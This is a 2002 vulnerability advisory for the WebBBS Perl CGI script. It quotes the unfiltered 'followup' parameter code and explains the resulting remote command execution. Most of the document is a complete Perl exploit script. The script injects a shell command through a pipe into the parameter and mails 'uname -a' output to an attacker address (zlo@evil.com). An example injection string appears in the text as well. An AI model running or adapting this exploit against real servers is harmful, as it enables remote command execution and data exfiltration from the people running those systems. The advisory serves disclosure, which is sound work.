|
COMMAND WebBBS remote command execution SYSTEMS AFFECTED All versions as of (19 June 2002) PROBLEM In Nerf gr0up [http://www.nerf.ru] advisory [#7] : WebBBS script allows command execution on server. This script does no filtering and due to this remote command execution is possible. The vulnerable code is shown below: webbbs_post.pl: ... if ($FORM{\'followup\'}) { $followup = \"$FORM{\'followup\'}\"; } ... if ($followup) { ... $subdir = \"bbs\".int($followup/1000); open (FOLLOWUP,\"$dir/$subdir/$followup\"); ... Just change the value of $followup variable, e.g \"followup=10\" to \"followup=10;uname -a|mail zlo@evil.com|\" to exploit this vulnerability. Exploit ======= #!/usr/bin/perl # # nerF gr0up # # exploit code for # WebBBS by Darryl C. Burgdorf # all version up to 5.00 are vulnerable # # # this is an exploitation of \"followup\" bug. # it allows remote attacker to execute shell commands. # you can find WebBBS script at http://awsd.com/scripts/webbbs/ # # 06.06.2002 # btr // nerf # nerf.ru use IO::Socket; srand(); $script = \"/cgi-bin/webbbs/webbbs_config.pl\"; $command = \"uname -a|mail zlo@evil.com\"; $host = \"localhost\"; $port = 80; $content = \"$content\" . \"name=\" . rand(254); $content = \"$content\" . \"&email=\" . rand(254); $content = \"$content\" . \"&subject=\" . rand(254); $content = \"$content\" . \"&body=\" . rand(254); $content=\"$content\".\"&followup=\".rand(254).\"|$command|\"; $content_length = length($content); $content_type = \"application/x-www-form-urlencoded\"; if (@ARGV[0]) {$command=@ARGV[0];} if (@ARGV[1]) {$host=@ARGV[1];} if (@ARGV[2]) {$script=@ARGV[2];} $buf = \"POST \" . \"$script\" . \"?post HTTP/1.0\\n\"; $buf = \"$buf\" . \"Content-Type: $content_type\\r\\nContent-Length:\"; $buf = \"$buf\" . \"$content_length\\r\\n\\r\\n$content\", 0; print \"\\tnerF gr0up\\n\"; print \"exploit: WebBBS (awsd.com), version up to 5.00\\n\"; print \"sent:\\n$buf\\n\"; if($socket = IO::Socket::INET->new(\"$host:$port\")){ print $socket \"$buf\"; read($socket,$buf,1500); print \"recieved:\\n$buf\\n\"; } SOLUTION Check : http://awsd.com/scripts/webbbs/